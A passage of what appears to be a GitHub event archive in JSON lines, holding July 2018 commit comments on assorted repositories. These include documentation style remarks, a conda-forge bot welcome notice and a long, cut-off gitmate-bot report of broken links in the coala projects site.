Badge](http://img.shields.io/badge/tests%20passed-99.97%25-yellow.png)</a> \n"}},"created_at":"2018-07-10T14:58:51Z"}
{"id":"7944401517","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658106,"position":52,"line":52,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T14:59:05Z","updated_at":"2018-07-10T14:59:05Z","author_association":"CONTRIBUTOR","body":"lowercase metadata"}},"created_at":"2018-07-10T14:59:05Z"}
{"id":"7944402073","type":"CommitCommentEvent","actor":{"login":"milospopovic993"},"repo":{"name":"milospopovic993/project-repository"},"payload":{"comment":{"id":29658108,"position":2,"line":2,"path":"README.md","commit_id":"21c3dd5f62cf104e13d87269b40dfe4f9e447773","created_at":"2018-07-10T14:59:10Z","updated_at":"2018-07-10T14:59:10Z","author_association":"OWNER","body":"comment"}},"created_at":"2018-07-10T14:59:10Z"}
{"id":"7944403615","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/rise-feedstock"},"payload":{"comment":{"id":29658110,"position":null,"line":null,"path":null,"commit_id":"c6a11eddef918dabbb910ab8d3a8eea22d096c98","created_at":"2018-07-10T14:59:23Z","updated_at":"2018-07-10T14:59:23Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @parmentelat were added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\n- @parmentelat were added to this feedstock maintenance team.\n  You should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-10T14:59:23Z"}
{"id":"7944404085","type":"CommitCommentEvent","actor":{"login":"iraarx"},"repo":{"name":"iraarx/iraarx.github.io"},"payload":{"comment":{"id":29658111,"position":null,"line":null,"path":null,"commit_id":"774664d92a4a8226a28d69df9be831f99fdff40e","created_at":"2018-07-10T14:59:27Z","updated_at":"2018-07-10T14:59:27Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-10T14:59:27Z"}
{"id":"7944405872","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"ViktorShvydrik/js"},"payload":{"comment":{"id":29658112,"position":21,"line":21,"path":"tenthLesson/tenthlessons.js","commit_id":"4699a40c5b3fe01032d0c92d53a919a2188099ee","created_at":"2018-07-10T14:59:43Z","updated_at":"2018-07-10T14:59:43Z","author_association":"NONE","body":"стараться делать в одну строку `return Math.pow(Math.round(x), Math.round(n));`"}},"created_at":"2018-07-10T14:59:43Z"}
{"id":"7944406809","type":"CommitCommentEvent","actor":{"login":"gcanti"},"repo":{"name":"gcanti/fp-ts"},"payload":{"comment":{"id":29658117,"position":8,"line":485,"path":"src/Array.ts","commit_id":"3d6f6f72cc6d7e7bc8c058e0d70cd4a1883ae1e8","created_at":"2018-07-10T14:59:52Z","updated_at":"2018-07-10T14:59:52Z","author_association":"OWNER","body":"> we should really consider fixing that in fp-ts as it rejects a lot of valid code\r\n\r\nThat's bad. Consider filing an issue then"}},"created_at":"2018-07-10T14:59:52Z"}
{"id":"7944407512","type":"CommitCommentEvent","actor":{"login":"ealunos"},"repo":{"name":"ealunos/Alunos"},"payload":{"comment":{"id":29658120,"position":null,"line":null,"path":null,"commit_id":"c72817945fddd6507b02b5d6ebf5df393ae3c481","created_at":"2018-07-10T14:59:59Z","updated_at":"2018-07-10T14:59:59Z","author_association":"OWNER","body":"r"}},"created_at":"2018-07-10T14:59:59Z"}
{"id":"7944410738","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658132,"position":56,"line":56,"path":"content/security/_index.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:00:25Z","updated_at":"2018-07-10T15:00:25Z","author_association":"CONTRIBUTOR","body":"lowercase metadata"}},"created_at":"2018-07-10T15:00:25Z"}
{"id":"7944415552","type":"CommitCommentEvent","actor":{"login":"ilyasiba"},"repo":{"name":"ViktorShvydrik/js"},"payload":{"comment":{"id":29658138,"position":33,"line":33,"path":"tenthLesson/tenthlessons.js","commit_id":"4699a40c5b3fe01032d0c92d53a919a2188099ee","created_at":"2018-07-10T15:01:06Z","updated_at":"2018-07-10T15:01:06Z","author_association":"NONE","body":"то же самое, можно в одну строку `return str.toLowerCase().indexOf(comb.toLowerCase()) != -1;`"}},"created_at":"2018-07-10T15:01:06Z"}
{"id":"7944415571","type":"CommitCommentEvent","actor":{"login":"froj"},"repo":{"name":"cvra/robot-software"},"payload":{"comment":{"id":29658139,"position":null,"line":null,"path":null,"commit_id":"350f8e3df7b63258cc14f925262c74b203173619","created_at":"2018-07-10T15:01:06Z","updated_at":"2018-07-10T15:01:06Z","author_association":"MEMBER","body":"Yes, this seems to have fixed the problem. "}},"created_at":"2018-07-10T15:01:06Z"}
{"id":"7944422021","type":"CommitCommentEvent","actor":{"login":"l0k0ms"},"repo":{"name":"DataDog/documentation"},"payload":{"comment":{"id":29658145,"position":15,"line":15,"path":"content/security/agent.md","commit_id":"cfa2f8ae30446dd5ce0d0a390a463552a163aa52","created_at":"2018-07-10T15:02:00Z","updated_at":"2018-07-10T15:02:00Z","author_association":"CONTRIBUTOR","body":"Agent should be capitalised "}},"created_at":"2018-07-10T15:02:00Z"}
{"id":"7944424918","type":"CommitCommentEvent","actor":{"login":"ivanslf"},"repo":{"name":"isaacs/nave"},"payload":{"comment":{"id":29658151,"position":92,"line":84,"path":"README.md","commit_id":"294ad6f0c80c89bb0ca0e62e1b129405f297cad9","created_at":"2018-07-10T15:02:26Z","updated_at":"2018-07-10T15:02:26Z","author_association":"NONE","body":"Okay, **this** is funny."}},"created_at":"2018-07-10T15:02:26Z"}
{"id":"7944426994","type":"CommitCommentEvent","actor":{"login":"Yash-I"},"repo":{"name":"Red0713/test"},"payload":{"comment":{"id":29658163,"position":null,"line":null,"path":null,"commit_id":"fa4f7235a3043d923018a3980a83e1e1de586ab0","created_at":"2018-07-10T15:02:44Z","updated_at":"2018-07-10T15:02:44Z","author_association":"NONE","body":"aaaaaaaaaaaaaaa"}},"created_at":"2018-07-10T15:02:44Z"}
{"id":"7944442353","type":"CommitCommentEvent","actor":{"login":"gitmate-bot"},"repo":{"name":"coala/projects"},"payload":{"comment":{"id":29658192,"position":null,"line":null,"path":null,"commit_id":"6a92cbd9f74a427786c5e928824e0a7de06d194e","created_at":"2018-07-10T15:05:00Z","updated_at":"2018-07-10T15:05:00Z","author_association":"NONE","body":"Comment on 6a92cbd9f74a427786c5e928824e0a7de06d194e.\n\nThere are 405 results for the section global. They have been shortened and will not be shown inline because they are more than 10.\n\n| Message | File | Line |\n|---|---|---|\n| Broken link - unable to connect to http://errbot.io | data/locale/en/projects/corobo_enhancement.md | 30 |\n| Broken link - unable to connect to https://fedorahosted.org/dogtail/ | _projects/editor_support.md | 54 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | _projects/automate_dependency_repology.md | 52 |\n| Broken link - unable to connect to https://coala.io/chat | partials/tabs/mentors.html | 48 |\n| Broken link - unable to connect to http://docutils.sourceforge.net/ | data/locale/en/projects/rstcheck_with_better_sphinx_support.md | 30 |\n| Broken link - unable to connect to http://www.sphinx-doc.org | data/locale/en/projects/rstcheck_with_better_sphinx_support.md | 40 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/enhance_coala_quickstart.md | 32 |\n| Broken link - unable to connect to https://langserver.org/ | _projects/coala_language_server.md | 28 |\n| Broken link - unable to connect to http://langserver.org | _projects/coala_language_server.md | 159 |\n| Broken link - unable to connect to https://username-check.herokuapp.com/?username=your_username | data/locale/en/faq/application_template.md | 14 |\n| Broken link - unable to connect to http://coala.io/newcomer | data/locale/en/faq/application_template.md | 41 |\n| Broken link - unable to connect to http://projects.coala.io | data/locale/en/faq/application_template.md | 47 |\n| Broken link - unable to connect to http://paste.ubuntu.com/24269550/ | _projects/extend_linter_integration.md | 68 |\n| Broken link - unable to connect to https://cloud.githubusercontent.com/assets/14862976/26557881/4103628c-44c2-11e7-9a06-68591d000aa0.jpg | _projects/extend_linter_integration.md | 117 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-lint-no-trailing-spaces | _projects/extend_linter_integration.md | 130 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-validate-links | _projects/extend_linter_integration.md | 152 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | data/locale/en/projects/git_task_list.md | 62 |\n| Broken link - unable to connect to http://wikidata.org | data/locale/en/projects/git_task_list.md | 87 |\n| Broken link - unable to connect to https://query.wikidata.org/ | data/locale/en/projects/git_task_list.md | 88 |\n| Broken link - unable to connect to http://gitlab.com/coala | data/locale/en/projects/git_task_list.md | 108 |\n| Broken link - unable to connect to https://bugs.launchpad.net/pyflakes/+bugs?field.tag=easy | data/locale/en/projects/integrate-pyflakes-AST.md | 19 |\n| Broken link - unable to connect to https://pypi.python.org/pypi/pyflakes | data/locale/en/projects/integrate-pyflakes-AST.md | 36 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Abstract_syntax_tree | data/locale/en/projects/integrate-pyflakes-AST.md | 37 |\n| Broken link - unable to connect to https://api.coala.io | data/locale/en/projects/integrate-pyflakes-AST.md | 51 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/organizations/6256279438229504/ | _projects/roberta_external_source.md | 26 |\n| Broken link - unable to connect to https://docs.google.com/document/d/1BLZO2tD93yKdO7XhMb5NgJvytu-pWDtPMRidGmjQ8EY/edit?usp=sharing | data/locale/en/projects/improve_diff_handling.md | 52 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/improve_diff_handling.md | 151 |\n| Broken link - unable to connect to https://api.coala.io/ | data/locale/en/projects/improve_diff_handling.md | 161 |\n| Broken link - unable to connect to https://api.coala.io/ | data/locale/en/projects/improve_diff_handling.md | 174 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4985377849868288 | reports/nkprince007.md | 8 |\n| Broken link - unable to connect to https://rawgit.com/nkprince007/GSoCReport/master/project.tar | reports/nkprince007.md | 9 |\n| Broken link - unable to connect to https://coala.io | reports/nkprince007.md | 18 |\n| Broken link - unable to connect to https://gitmate.io | reports/nkprince007.md | 18 |\n| Broken link - unable to connect to https://gitter.im/nkprince007 | reports/nkprince007.md | 29 |\n| Broken link - unable to connect to https://medium.com/my-new-roots | reports/nkprince007.md | 31 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/organizations/5572716199936000/ | _projects/create_jenkins_plugin.md | 28 |\n| Broken link - unable to connect to https://groups.google.com/forum/#!msg/jenkinsci-dev/2LciAQgdRcY/Kv2rQlwXAAAJ | _projects/create_jenkins_plugin.md | 41 |\n| Broken link - unable to connect to https://wiki.jenkins-ci.org/display/JENKINS/Warnings+Plugin | _projects/create_jenkins_plugin.md | 44 |\n| Broken link - unable to connect to https://coala.io | reports/example.md | 8 |\n| Broken link - unable to connect to https://gitter.im/ | reports/example.md | 30 |\n| Broken link - unable to connect to https://hackerrank.com/ | reports/example.md | 33 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 20 |\n| Broken link - unable to connect to https://docs.python.org/3.4/library/pdb.html | data/locale/en/projects/debug_profile.md | 57 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/debug_profile.md | 58 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/nested_languages.md | 51 |\n| Broken link - unable to connect to https://gitmate.io/ | data/locale/en/projects/gitmate_testing.md | 31 |\n| Broken link - unable to connect to https://gitmate.io | data/locale/en/projects/gitmate_testing.md | 59 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | data/locale/en/projects/gitmate_testing.md | 81 |\n| Broken link - unable to connect to http://coala.io/chat | data/locale/en/projects/add_repo_license.md | 18 |\n| Broken link - unable to connect to https://help.github.com/articles/adding-a-license-to-a-repository/ | data/locale/en/projects/add_repo_license.md | 52 |\n| Broken link - unable to connect to https://choosealicense.com/ | data/locale/en/projects/add_repo_license.md | 128 |\n| Broken link - unable to connect to http://besutkode.org/elimination/2016/11/01/31-october-elimination-results/ | data/locale/en/projects/add_repo_license.md | 146 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/licensing | data/locale/en/projects/add_repo_license.md | 150 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/github | data/locale/en/projects/add_repo_license.md | 151 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/gpl | data/locale/en/projects/add_repo_license.md | 152 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/lgpl | data/locale/en/projects/add_repo_license.md | 153 |\n| Broken link - unable to connect to https://developer.github.com/v4/enum/reactioncontent/ | _projects/meta_review.md | 34 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 18 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Software_metric | _projects/implement_metrics_for_coala.md | 27 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/implement_metrics_for_coala.md | 49 |\n| Broken link - unable to connect to https://www.riverbankcomputing.com/software/sip/intro | _projects/automate_vulture_whitelist.md | 34 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | _projects/automate_vulture_whitelist.md | 35 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | _projects/automate_vulture_whitelist.md | 81 |\n| Broken link - unable to connect to http://code.qt.io/cgit/pyside/pyside-setup.git/tree/sources/shiboken2 | _projects/automate_vulture_whitelist.md | 85 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to http://projects.coala.io/#/mentors | data/locale/en/faq/mentor_obligations.md | 25 |\n| Broken link - unable to connect to http://coala.io/chat | _projects/add_repo_license.md | 18 |\n| Broken link - unable to connect to https://help.github.com/articles/adding-a-license-to-a-repository/ | _projects/add_repo_license.md | 52 |\n| Broken link - unable to connect to https://choosealicense.com/ | _projects/add_repo_license.md | 128 |\n| Broken link - unable to connect to http://besutkode.org/elimination/2016/11/01/31-october-elimination-results/ | _projects/add_repo_license.md | 146 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/licensing | _projects/add_repo_license.md | 150 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/github | _projects/add_repo_license.md | 151 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/gpl | _projects/add_repo_license.md | 152 |\n| Broken link - unable to connect to https://stackoverflow.com/questions/tagged/lgpl | _projects/add_repo_license.md | 153 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 18 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Software_metric | data/locale/en/projects/implement_metrics_for_coala.md | 27 |\n| Broken link - unable to connect to https://coala.io/cep | data/locale/en/projects/implement_metrics_for_coala.md | 49 |\n| Broken link - unable to connect to https://docs.google.com/document/d/10FHYhRzK9IxroDoPxI5V_nWCR3DO-g-C-g12B0WKkQA/edit?usp=sharing | data/locale/en/projects/coala_cli.md | 150 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | _projects/git_task_list.md | 30 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | _projects/git_task_list.md | 37 |\n| Broken link - unable to connect to http://github.com/coala | _projects/git_task_list.md | 48 |\n| Broken link - unable to connect to http://gitlab.com/coala | _projects/git_task_list.md | 48 |\n| Broken link - unable to connect to https://coala.github.io/git-task-list/ | _projects/git_task_list.md | 62 |\n| Broken link - unable to connect to http://wikidata.org | _projects/git_task_list.md | 87 |\n| Broken link - unable to connect to https://query.wikidata.org/ | _projects/git_task_list.md | 88 |\n| Broken link - unable to connect to http://gitlab.com/coala | _projects/git_task_list.md | 108 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#6564412442804224 | reports/RJ722.md | 8 |\n| Broken link - unable to connect to https://coala.io | reports/RJ722.md | 20 |\n| Broken link - unable to connect to https://gitter.im/RJ722 | reports/RJ722.md | 32 |\n| Broken link - unable to connect to https://rj722.github.io/blog | reports/RJ722.md | 34 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 19 |\n| Broken link - unable to connect to https://coala.io/cep | _projects/nested_languages.md | 51 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | _projects/go_bears_on_bsd.md | 102 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/id/faq/contact_mentor.md | 1 |\n| Broken link - unable to connect to https://gitmate.io/ | _projects/gitmate_jira.md | 50 |\n| Broken link - unable to connect to https://www.atlassian.com/software/jira | _projects/gitmate_jira.md | 50 |\n| Broken link - unable to connect to https://gitmate.io/ | _projects/gitmate_jira.md | 56 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Writing_Plugin/ | _projects/gitmate_jira.md | 58 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | _projects/gitmate_jira.md | 69 |\n| Broken link - unable to connect to https://docs.google.com/document/d/10FHYhRzK9IxroDoPxI5V_nWCR3DO-g-C-g12B0WKkQA/edit?usp=sharing | _projects/coala_cli.md | 150 |\n| Broken link - unable to connect to http://paste.ubuntu.com/24269550/ | data/locale/en/projects/extend_linter_integration.md | 68 |\n| Broken link - unable to connect to https://cloud.githubusercontent.com/assets/14862976/26557881/4103628c-44c2-11e7-9a06-68591d000aa0.jpg | data/locale/en/projects/extend_linter_integration.md | 117 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-lint-no-trailing-spaces | data/locale/en/projects/extend_linter_integration.md | 130 |\n| Broken link - unable to connect to https://www.npmjs.com/package/remark-validate-links | data/locale/en/projects/extend_linter_integration.md | 152 |\n| Broken link - unable to connect to https://username-check.herokuapp.com/?username=your_username | _faq/application_template.md | 14 |\n| Broken link - unable to connect to http://coala.io/newcomer | _faq/application_template.md | 41 |\n| Broken link - unable to connect to http://projects.coala.io | _faq/application_template.md | 47 |\n| Broken link - unable to connect to http://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | data/locale/en/projects/bear_updates.md | 37 |\n| Broken link - unable to connect to http://api.coala.io/en/latest/Developers/Writing_Linter_Bears.html | data/locale/en/projects/bear_updates.md | 55 |\n| Broken link - unable to connect to https://coala.io/chat | data/locale/en/faq/student_obligations.md | 6 |\n| Broken link - unable to connect to https://blog.coala.io | data/locale/en/faq/student_obligations.md | 8 |\n| Broken link - unable to connect to https://gitmate.io/ | data/locale/en/projects/gitmate_jira.md | 50 |\n| Broken link - unable to connect to https://www.atlassian.com/software/jira | data/locale/en/projects/gitmate_jira.md | 50 |\n| Broken link - unable to connect to https://gitmate.io/ | data/locale/en/projects/gitmate_jira.md | 56 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Writing_Plugin/ | data/locale/en/projects/gitmate_jira.md | 58 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | data/locale/en/projects/gitmate_jira.md | 69 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/contact_mentor.md | 4 |\n| Broken link - unable to connect to https://developers.google.com/open-source/gsoc/timeline | data/locale/en/faq/coala_will_apply_for_gsoc_2018.md | 4 |\n| Broken link - unable to connect to https://ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js | 404.html | 14 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/materialize/0.97.8/js/materialize.min.js | 404.html | 15 |\n| Broken link - unable to connect to https://rawgit.com/coala/coalaCSS/master/coala.css | 404.html | 18 |\n| Broken link - unable to connect to https://fonts.googleapis.com/css?family=Roboto+Mono:300,300i,400,400i,700,700i | 404.html | 19 |\n| Broken link - unable to connect to https://fonts.googleapis.com/icon?family=Material+Icons | 404.html | 20 |\n| Broken link - unable to connect to https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css | 404.html | 21 |\n| Broken link - unable to connect to https://api.coala.io/en/latest/_static/images/coala_logo.svg | 404.html | 39 |\n| Broken link - unable to connect to https://projects.coala.io | README.md | 9 |\n| Broken link - unable to connect to https://jekyllrb.com/docs/installation/ | README.md | 32 |\n| Broken link - unable to connect to https://jekyllrb.com/docs/troubleshooting/ | README.md | 46 |\n| Broken link - unable to connect to https://gitmate.io/ | _projects/gitmate_testing.md | 31 |\n| Broken link - unable to connect to https://gitmate.io | _projects/gitmate_testing.md | 59 |\n| Broken link - unable to connect to http://docs.gitmate.io/Developers/Newcomers_Guide/ | _projects/gitmate_testing.md | 81 |\n| Broken link - unable to connect to https://developers.google.com/open-source/gsoc/faq#what_are_the_eligibility_requirements_for_participation | data/locale/en/faq/gsoc_requirements.md | 4 |\n| Broken link - unable to connect to https://coala.io/newcomer | data/locale/en/faq/gsoc_requirements.md | 6 |\n| Broken link - unable to connect to https://coala.io/usability | data/locale/en/faq/gsoc_requirements.md | 7 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/mentor_obligations.md | 13 |\n| Broken link - unable to connect to https://blog.coala.io | _faq/mentor_obligations.md | 15 |\n| Broken link - unable to connect to http://projects.coala.io/#/mentors | _faq/mentor_obligations.md | 25 |\n| Broken link - unable to connect to https://developer.github.com/v4/enum/reactioncontent/ | data/locale/en/projects/meta_review.md | 34 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#6012382913495040 | reports/hemang.md | 8 |\n| Broken link - unable to connect to https://coala.io | reports/hemang.md | 19 |\n| Broken link - unable to connect to https://gitter.im/hemangsk | reports/hemang.md | 29 |\n| Broken link - unable to connect to https://hackerrank.com/hemang | reports/hemang.md | 32 |\n| Broken link - unable to connect to http://hemangsk.github.io/stories.html | reports/hemang.md | 34 |\n| Broken link - unable to connect to https://coala.io/#/coalaonline | reports/hemang.md | 207 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 6 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/projects/#4940869170888704 | reports/alex.md | 8 |\n| Broken link - unable to connect to https://rawgit.com/Nosferatul/GSoCReport/master/Nosferatul_coala.tar | reports/alex.md | 9 |\n| Broken link - unable to connect to https://coala.io | reports/alex.md | 18 |\n| Broken link - unable to connect to https://gitter.im/Nosferatul | reports/alex.md | 28 |\n| Broken link - unable to connect to https://gsocsite.wordpress.com/category/gsoc/ | reports/alex.md | 30 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/6236781315883008/ | data/locale/en/projects/use_coala_3.md | 21 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | data/locale/en/projects/use_coala_3.md | 34 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | data/locale/en/projects/use_coala_3.md | 35 |\n| Broken link - unable to connect to https://gitter.im/coala/coala | data/locale/en/projects/use_coala_3.md | 150 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | data/locale/en/projects/use_coala_3.md | 194 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | data/locale/en/projects/use_coala_3.md | 195 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | data/locale/en/projects/use_coala_3.md | 196 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | data/locale/en/projects/use_coala_3.md | 197 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | data/locale/en/projects/use_coala_3.md | 198 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | data/locale/en/projects/use_coala_3.md | 199 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | data/locale/en/projects/use_coala_3.md | 200 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | data/locale/en/projects/use_coala_3.md | 201 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | data/locale/en/projects/use_coala_3.md | 202 |\n| Broken link - unable to connect to https://www.python.org/dev/peps/pep-0257/ | _projects/documentation_extraction.md | 34 |\n| Broken link - unable to connect to https://cloud.githubusercontent.com/assets/15556382/26275557/580cae2c-3d81-11e7-89ed-ac1ccbf9dc26.png | _projects/vulture.md | 41 |\n| Broken link - unable to connect to https://bitbucket.org/m0hawk | _projects/vulture.md | 90 |\n| Broken link - unable to connect to https://docs.google.com/document/d/1gzRH-rdJsiAD-TOEB0O4OqtcnTp0zotcNl6agAuXGHw/edit?usp=sharing | _projects/vulture.md | 134 |\n| Broken link - unable to connect to https://www.google-analytics.com/analytics.js | resources/js/analytics.js | 4 |\n| Broken link - unable to connect to https://coala.io/chat | _faq/is_mentor_necessary.md | 12 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/5179714090041344/ | data/locale/en/projects/use_coala_2.md | 21 |\n| Broken link - unable to connect to http://brew.sh/ | data/locale/en/projects/use_coala_2.md | 42 |\n| Broken link - unable to connect to https://git-for-windows.github.io/ | data/locale/en/projects/use_coala_2.md | 44 |\n| Broken link - unable to connect to https://msys2.github.io/ | data/locale/en/projects/use_coala_2.md | 45 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Lint_(software) | data/locale/en/projects/use_coala_2.md | 53 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Continuous_integration | data/locale/en/projects/use_coala_2.md | 54 |\n| Broken link - unable to connect to http://coala.readthedocs.io/en/latest/Users/Docker_Image.html#coala-on-travis-ci | data/locale/en/projects/use_coala_2.md | 104 |\n| Broken link - unable to connect to https://en.wikipedia.org/wiki/Snake_case | data/locale/en/projects/use_coala_2.md | 126 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/coala | data/locale/en/projects/use_coala_2.md | 270 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/continuous-integration | data/locale/en/projects/use_coala_2.md | 271 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/lint | data/locale/en/projects/use_coala_2.md | 272 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/static-analysis | data/locale/en/projects/use_coala_2.md | 273 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/git | data/locale/en/projects/use_coala_2.md | 274 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/github | data/locale/en/projects/use_coala_2.md | 275 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/travis-ci | data/locale/en/projects/use_coala_2.md | 276 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/docker | data/locale/en/projects/use_coala_2.md | 277 |\n| Broken link - unable to connect to http://stackoverflow.com/questions/tagged/bash | data/locale/en/projects/use_coala_2.md | 278 |\n| Broken link - unable to connect to https://www.dartlang.org/install | _projects/improve_installation.md | 77 |\n| Broken link - unable to connect to https://www.google.com/docs/about/ | data/locale/en/faq/writing_a_great_proposal.md | 26 |\n| Broken link - unable to connect to http://write.flossmanuals.net/gsocstudentguide/what-is-google-summer-of-code/ | data/locale/en/faq/writing_a_great_proposal.md | 28 |\n| Broken link - unable to connect to https://www.google.com/docs/about/ | _faq/writing_a_great_proposal.md | 26 |\n| Broken link - unable to connect to http://write.flossmanuals.net/gsocstudentguide/what-is-google-summer-of-code/ | _faq/writing_a_great_proposal.md | 28 |\n| Broken link - unable to connect to https://summerofcode.withgoogle.com/organizations/5572716199936000/ | data/locale/en/projects/create_jenkins_plugin.md | 28 |\n| Broken link - unable to connect to https://groups.google.com/forum/#!msg/jenkinsci-dev/2LciAQgdRcY/Kv2rQlwXAAAJ | data/locale/en/projects/create_jenkins_plugin.md | 41 |\n| Broken link - unable to connect to https://wiki.jenkins-ci.org/display/JENKINS/Warnings+Plugin | data/locale/en/projects/create_jenkins_plugin.md | 44 |\n| Broken link - unable to connect to https://www.python.org/dev/peps/pep-0257/ | data/locale/en/projects/documentation_extraction.md | 34 |\n| Broken link - unable to connect to http://coala.io/commit | PULL_REQUEST_TEMPLATE.md | 16 |\n| Broken link - unable to connect to https://coala.io/rebase | PULL_REQUEST_TEMPLATE.md | 25 |\n| Broken link - unable to connect to https://coala.io/review | PULL_REQUEST_TEMPLATE.md | 30 |\n| Broken link - unable to connect to https://coala.io/reviewing | PULL_REQUEST_TEMPLATE.md | 31 |\n| Broken link - unable to connect to https://codein.withgoogle.com/dashboard/tasks/5179714090041344/ | _projects/use_coala_2.md | 21 |\n| Broken link - unable to connect to http://brew.sh/ | _projects/use_coala_2.md | 42 |\n| Broken link - unable to connect to https://git-for-windows.github.io/ | _projects/use_coala_2.md | 44 |\n| Broken link - unable to connect to https://msys2.github.io/ | _projects/use_coala_2.md | 45 |\n| Broken link - unable to connect to 